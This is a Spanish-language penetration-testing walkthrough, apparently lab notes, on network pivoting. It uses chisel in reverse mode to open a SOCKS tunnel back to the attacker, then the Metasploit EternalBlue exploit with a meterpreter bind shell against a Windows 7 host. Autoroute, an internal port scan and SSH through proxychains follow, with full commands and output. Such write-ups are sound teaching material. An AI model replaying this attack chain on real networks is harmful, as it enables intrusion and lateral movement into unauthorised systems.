Pivoting
Chisel
Para crear un socket usaremos chisel. En la maquina atacante levantamos el chisel server con el comando:
chisel server -p 8000 --reverseEn la maquina victima, nos pasamos el chisel. (Si es windows pasamos el chisel.exe que encontramos en el repositorio oficial)
chisel.exe client 192.168.18.41:8000 R:socksCon esto levantamos un socks5 en el puerto 1080. Configuramos el archivo de proxychains /etc/proxychains.conf:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080Luego podemos usar proxychains:
proxychains curl 192.168.172.130Doble Pivote con Metasploit
Primero empezamos con detectar la ip con windows en la segunda red, la cual es: 192.168.172.143. Verificamos si es vulnerable a eternalblue.
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.172.143 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)Entonces al probar vemos que debemos agregar el socket a la conexion.
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[*] 169.254.106.25:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedLo agregamos con el siguiente comando:
set PROXIES SOCKS5:127.0.0.1:1080Y luego podemos ver que si es vulnerable:
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.172.143:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedLuego usamos el exploit de eternalblue
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpElegimos el payload bind_shell, puesto que la maquina objetivo no tienen acceso a nuestra ip pero nosotros si a ella.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcpLuego actualizamos las direcciones del target.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.172.143
RHOSTS => 192.168.172.143
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.172.143
RHOST => 192.168.172.143Luego ingresamos de nuevo el proxy ya que se borra cuando actualizamos con el comando use.
set PROXIES SOCKS5:127.0.0.1:1080Corremos el exploit para obtener la shell.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] 192.168.172.143:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.172.143:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.172.143:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.172.143:445 - The target is vulnerable.
[*] 192.168.172.143:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.172.143:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.172.143:445 - Connecting to target for exploitation.
[+] 192.168.172.143:445 - Connection established for exploitation.
[+] 192.168.172.143:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.172.143:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.172.143:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.172.143:445 - 0x00000010 61 73 69 63 20 37 36 30 30 asic 7600
[+] 192.168.172.143:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.172.143:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.172.143:445 - Sending all but last fragment of exploit packet
[*] 192.168.172.143:445 - Starting non-paged pool grooming
[+] 192.168.172.143:445 - Sending SMBv2 buffers
[+] 192.168.172.143:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.172.143:445 - Sending final SMBv2 buffers.
[*] 192.168.172.143:445 - Sending last fragment of exploit packet!
[*] 192.168.172.143:445 - Receiving response from exploit packet
[+] 192.168.172.143:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.172.143:445 - Sending egg to corrupted connection.
[*] 192.168.172.143:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.172.143:4444
[*] Sending stage (200262 bytes) to 192.168.172.143
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:1080) at 2022-01-03 12:15:13 -0800
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Ahora realizamos un ipconfig para verificar las redes presentes.
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:f2:5c:18
MTU : 1500
IPv4 Address : 192.168.172.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::887:d7b7:f6cf:2199
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 17
============
Name : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:f2:5c:22
MTU : 1500
IPv4 Address : 169.254.106.25
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::394a:efca:78d8:6a19
IPv6 Netmask : ffff:ffff:ffff:ffff::Entonces, ahora lo que haremos sera realizar un autoroute
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search autoroute
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/autoroute normal No Multi Manage Network Route via Meterpreter Session
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/autoroute
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 169.254.106.0
SUBNET => 169.254.106.0
msf6 post(multi/manage/autoroute) > set CMD add
CMD => add
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module.
[*] Running module against TEST
[*] Adding a route to 169.254.106.0/255.255.255.0...
[+] Route added to subnet 169.254.106.0/255.255.255.0.
[*] Post module execution completedLuego podemos realizar un portscan en el puerto 22 para detectar las ips con servicio SSH.
msf6 post(multi/manage/autoroute) > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/sap/sap_router_portscanner
msf6 post(multi/manage/autoroute) > use 5
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 169.254.106.0/24
RHOSTS => 169.254.106.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22
PORTS => 22
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 40
THREADS => 40
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 169.254.106.26: - 169.254.106.26:22 - TCP OPEN
[*] 169.254.106.0/24: - Scanned 38 of 256 hosts (14% complete)
[*] 169.254.106.0/24: - Scanned 68 of 256 hosts (26% complete)
[*] 169.254.106.0/24: - Scanned 80 of 256 hosts (31% complete)
[*] 169.254.106.0/24: - Scanned 113 of 256 hosts (44% complete)
[*] 169.254.106.0/24: - Scanned 129 of 256 hosts (50% complete)
[*] 169.254.106.0/24: - Scanned 160 of 256 hosts (62% complete)
[*] 169.254.106.0/24: - Scanned 183 of 256 hosts (71% complete)
[*] 169.254.106.0/24: - Scanned 205 of 256 hosts (80% complete)
[*] 169.254.106.0/24: - Scanned 238 of 256 hosts (92% complete)
[*] 169.254.106.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completedLo que ahora haremos sera levantar un socket para poder conectarnos por ssh a esa direccion IP.
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy serverAhora podemos configurar de nuevo nuestro proxychains en el socket 9050.
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 9050Luego, nos conectamos usando proxychains para verificar que el proxychains esta conectado correctamente.
proxychains ssh leonardosd@169.254.106.26
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-169.254.106.26:22-<><>-OK
leonardosd@169.254.106.26's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-43-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
152 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Jan 3 11:24:26 2022 from 169.254.106.25
leonardosd@ubuntu:~$ Last updated